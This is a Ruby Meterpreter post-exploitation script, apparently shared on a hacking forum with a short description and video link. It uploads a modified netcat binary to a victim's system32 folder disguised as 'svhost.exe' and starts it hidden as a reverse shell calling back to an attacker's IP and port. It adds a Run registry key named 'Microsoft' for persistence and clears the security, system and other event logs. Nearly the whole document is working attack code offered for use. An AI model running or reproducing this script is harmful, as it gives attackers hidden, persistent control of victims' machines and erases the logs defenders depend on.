sbd.rb

[Gonzalez]

sbd.rb uploads sbd.exe runs as svchost.exe with the settings that are entered ny attacker

it autoruns via registry & autostarts as the script is run then clears system logs remeber it is a modded netcat for a reverse shell needs some more edits to script to hide the reg a little better but this will do till update time

session = client
host,port = session.tunnel_peer.split(':')
#Menu-Options
@@exec_opts = Rex::Parser::Arguments.new(
    "-r" => [ true,  "Resporn time limit." ],
    "-p" => [ true,  "Port Number to open." ],
    "-k" => [ true,  "Authentication name."],
    "-h" => [ true,  "Local ip address."]
)  
def usage
    print_line("Sbd Configuration Meterpreter Script by Intern0t.net")
    print_line("   Michael Johnson  (Zero Cold)  mjog123@hotmail.com   ")
    print_line("####################################################")
    print(@@exec_opts.usage)
    raise Rex::Script::Completed
end

#Files to upload to target host
ncexe = File.join(Msf::Config.install_root, "data", "sbd.exe")
#Function to upload files
def upload(session,file)
    location = session.fs.file.expand_path("%SystemRoot%\\system32")
    fileontrgt = "#{location}\\#{"svhost"}.exe"
    print_status("Uploading #{file}....")
    session.fs.file.upload_file("#{fileontrgt}","#{file}")
    print_status("#{file} Uploaded!")
    return fileontrgt
end

#Function to execute sbd
def sbdrun(session,time,auth,port,ip)
    location = session.fs.file.expand_path("%SystemRoot%\\system32")
    session.sys.process.execute("cmd /c #{location}\\svhost.exe -q -r #{time} -k #{auth} -e cmd.exe -D on -p #{port} #{ip}", nil, {'Hidden' => true, 'Channelized' => false})
    print_status("Local Ip  Sbd Will Connect Back On: #{ip}")
    print_status("Local Port Sbd Will Connect Back On: #{port}")
    print_status("Pass Phrase: #{auth}")
    print_status("Respawn Time: #{time}")
end
#Fuction to add registry for sbd
def regadd(session,time,auth,port,ip)
    location = session.fs.file.expand_path("%SystemRoot%\\system32")
    print_status("Adding to Registry ...")
    session.sys.process.execute("cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /f /v Microsoft /d \"#{location}\\svhost.exe\ -q -r #{time} -k #{auth} -e cmd -D on -p #{port} #{ip}\"", nil, {'Hidden' => true, 'Channelized' => false})
     print_status("Successfully added to Registry  ...")
end
def clrevtlgs(session)
    evtlogs = [
        'security',
        'system',
        'application',
        'directory service',
        'dns server',
        'file replication service'
    ]

    begin
        evtlogs.each do |evl|
            log = session.sys.eventlog.open(evl)
            log.clear
        end
    rescue ::Exception => e
        print_status("Error clearing Event Log: #{e.class} #{e}")

    end
end

#Menu-Imput
time  = nil
port = nil
ip   = nil
auth = nil
@@exec_opts.parse(args) { |opt, idx, val|
    case opt
        when "-r"
            time  = val
        when "-p"
            port = val
        when "-h"
              ip = val
        when "-k"
            auth = val 
        end

}
if port

upload(session,ncexe)
sbdrun(session,time,auth,port,ip)
regadd(session,time,auth,port,ip)
clrevtlgs(session)
else
    usage
end

Video:

http://www.youtube.com/watch?v=imFAm3AxOuc